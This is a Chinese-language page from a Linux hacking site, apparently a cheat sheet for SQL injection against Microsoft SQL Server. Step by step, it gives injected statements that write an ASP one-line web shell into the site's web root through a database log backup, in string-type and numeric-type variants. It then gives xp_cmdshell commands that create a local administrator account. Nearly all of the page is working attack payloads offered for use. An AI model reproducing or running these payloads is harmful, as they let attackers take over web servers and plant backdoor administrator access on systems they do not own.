Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

手工差异备份

来源: 未知 分享至:

字符型

1.恢复当前库
;alter database 当前库 set RECOVERY FULL--
2.创建表cmd
;create table cmd (a image)--
3.备份当前库到D:\cmd1
;backup log 当前库 to disk = 'D:\cmd1' with init--
4.插入一句话代码到创建的表cmd
;insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--

5.备份一句话代码到站点根目录
;backup log 当前库 to disk = 'D:\www_web\oct.asp'--
6.完成
';drop table 创建的表--
----------------------------------
数字型


1.恢复当前库
';alter database 当前库 set RECOVERY FULL--
2.创建表cmd
';create table cmd (a image)--
3.备份当前库到D:\cmd1
';backup log 当前库 to disk = 'D:\cmd1' with init--
4.插入一句话代码到创建的表cmd
';insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--
5.备份一句话代码到站点根目录
';backup log 当前库 to disk = 'D:\www_web\oct.asp'--
6.完成
';drop table 创建的表--
--------------------------------
sa权限创建管理员用户

1.判断是否有注入;and 1=1 ;and 1=2
;and user_name()='dbo' 判断当前系统的连接用户是不是sa

2.添加系统的管理员
;exec master.dbo.xp_cmdshell 'net user wk wk90/add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators wk /add';--


最新图文资讯
1 2 3 4 5 6
相关文章列表:
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史